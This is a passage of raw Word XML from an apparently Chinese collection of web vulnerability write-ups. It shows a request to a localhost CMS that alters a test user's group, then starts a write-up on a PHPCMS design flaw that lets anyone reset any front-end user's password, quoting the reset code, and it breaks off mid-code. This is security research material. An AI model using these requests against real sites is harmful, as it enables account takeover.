          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-5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2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="37"/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那么我</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>们</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>头</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>在看看</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="51" w:line="304" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>发送</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId65">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
            <w:w w:val="95"/>
            <w:sz w:val="21"/>
          </w:rPr>
          <w:t>http://localhost/uploads/index.php?case=user&amp;act=respon</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>d&amp;ologin_code=groupid</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="307" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="1113"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>postdata</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>username=test&amp;password=111111&amp;su</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>bmit=xxx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="1"/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这时候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看看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia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我</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>们</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-84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test </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>户组为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia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1"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="10"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="417"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:noProof/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4017266" cy="564737"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9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266" cy="56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2"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="1" w:line="355" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="66" w:name="PHPCMS设计缺陷可重置前台任意用户密码_"/>
      <w:bookmarkStart w:id="67" w:name="_bookmark31"/>
      <w:bookmarkEnd w:id="66"/>
      <w:bookmarkEnd w:id="67"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">PHPCMS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:spacing w:val="22"/>
          <w:sz w:val="32"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>设计缺陷可重置前台任意用户密</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:spacing w:val="22"/>
          <w:sz w:val="32"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="241"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>作者：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>loopx9</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="155"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t>\phpcms\modules\member\index.php:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:shape id="_x0000_s8386" type="#_x0000_t202" style="position:absolute;margin-left:80.7pt;margin-top:16.45pt;width:337.5pt;height:295.35pt;z-index:570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Verdana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</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>通过用户名找回密码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180" w:right="2332" w:firstLine="914"/>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>public</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> function public_forget_password_username() {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 xml:space="preserve">$step = </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>intval(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$_POST['step']);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 xml:space="preserve">$step = </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>max(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$step,1);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$this-&gt;</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>_session_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>start(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Verdana"/>
                      <w:sz w:val="17"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3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isset($_POST['dosubmit']) &amp;&amp;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  <w:rPr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$step==2) {</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="65"/>
                    <w:ind w:left="2012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处理提交申请，以手机号为准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180" w:right="909" w:firstLine="274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($_SESSION['code'] != strtolower($_POST['code'])) {</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="8"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana"/>
                      <w:sz w:val="26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showmessage(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>L('code_error'), HTTP_REFERER);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476" w:firstLine="2748"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$username = safe_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$_POST['username']);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Verdana"/>
          <w:sz w:val="23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385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477" w:right="882"/>
                    <w:jc w:val="center"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$r =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>$this-&gt;db-&gt;get_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>one(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array('username'=&gt;$username),'use </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>rid,email');</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="2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$r['email']=='') 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'userid']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'';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'code'] =</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-59"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'';</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="62" w:line="283" w:lineRule="auto"/>
                    <w:ind w:left="180" w:right="321" w:firstLine="3662"/>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>showmessage(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该账号没有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绑定手机号码，请选择其他方式找回！</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>");</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="73"/>
                    <w:ind w:left="957" w:right="882"/>
                    <w:jc w:val="center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'userid']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r[</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'userid'];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'email']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r[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>email'];</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="124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355" w:firstLine="2748"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve">$email_arr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'@',$r['email']);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668" w:firstLine="2748"/>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>include</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> template('member', 'forget_password_username');</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:ind w:left="1945" w:right="210"/>
                    <w:jc w:val="center"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve">} </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>elseif(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>isset($_POST['dosubmit']) &amp;&amp;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step</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>==3)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729" w:firstLine="2748"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$sms_report_db = pc_base::load_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>model(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'sms_report_model');</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:ind w:left="2928" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$mobile_verify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'mobile_verify'];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2928" w:right="427"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$email = 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'email']; if($email){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if(!preg_match('/^([a-z0-9_]+)@([a-z0-9_]+).(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[</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>a-z</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>]{2</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>,6</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>})$/'</w:t>
                  </w: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email)) exit('check email error');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7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$_SESSION['emc_times']=='' ||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'emc_times']&lt;=0){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384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spacing w:line="280" w:lineRule="auto"/>
                    <w:ind w:left="180" w:right="204" w:firstLine="4579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showmessage("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验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证次数超过</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-56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5</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-76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次</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="zh-CN"/>
                    </w:rPr>
                    <w:t>,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验证码失效，请重新获取邮箱验证码！</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="75"/>
                    <w:ind w:left="180" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>"</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>,HTTP</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>_REFERER,3000);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'emc_times']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= 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'emc_times']-1;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$_SESSION['emc']!='' &amp;&amp;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'email_verify']==$_SESSION['emc']) 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right="898"/>
                    <w:jc w:val="right"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$userid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'userid'];</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126"/>
                    <w:ind w:right="415"/>
                    <w:jc w:val="right"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$updateinfo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4"/>
                    <w:ind w:right="658"/>
                    <w:jc w:val="right"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$password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random(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>8,"23456789abcdefghkmnrstwxy");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28" w:firstLine="4579"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve">$encrypt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random(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6,"23456789abcdefghkmnrstwxyABCDEFGHKMNRSTWXY </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>");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updateinfo[</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'encrypt'] = $encrypt;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updateinfo[</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'password'] = password($password,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$encrypt);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88" w:lineRule="auto"/>
                    <w:ind w:left="180" w:right="2020" w:firstLine="914"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$this-&gt;db-&gt;</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>update(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$updateinfo, array('userid'=&gt;$userid));</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="2"/>
                    <w:ind w:right="1380"/>
                    <w:jc w:val="right"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$rs =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>$this-&gt;db-&gt;get_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>one(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array('userid'=&gt;$userid),'phpssou </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>id');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pc_base::load_config('system', 'phpsso'))</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-86"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333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383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ind w:right="226"/>
                    <w:jc w:val="right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  <w:w w:val="95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初始化</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="112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phpsso</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/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$this-&gt;_init_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>phpsso(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$this-&gt;client-&gt;ps_member_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>edit(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'', '', '',</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126"/>
                    <w:ind w:left="161" w:right="1845"/>
                    <w:jc w:val="center"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$password, $</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>rs[</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'phpssouid'], $encrypt);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126"/>
                    <w:ind w:right="1863"/>
                    <w:jc w:val="right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'email'] = '';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'userid'] = '';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'emc'</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>] = '';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'code'] = '';</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="79" w:line="664" w:lineRule="exact"/>
                    <w:ind w:left="1095" w:right="1383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pc_base::load_sys_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>func(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'mail'); sendmail($email, '</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>密码重置通知</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>', "</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>您在</w:t>
                  </w:r>
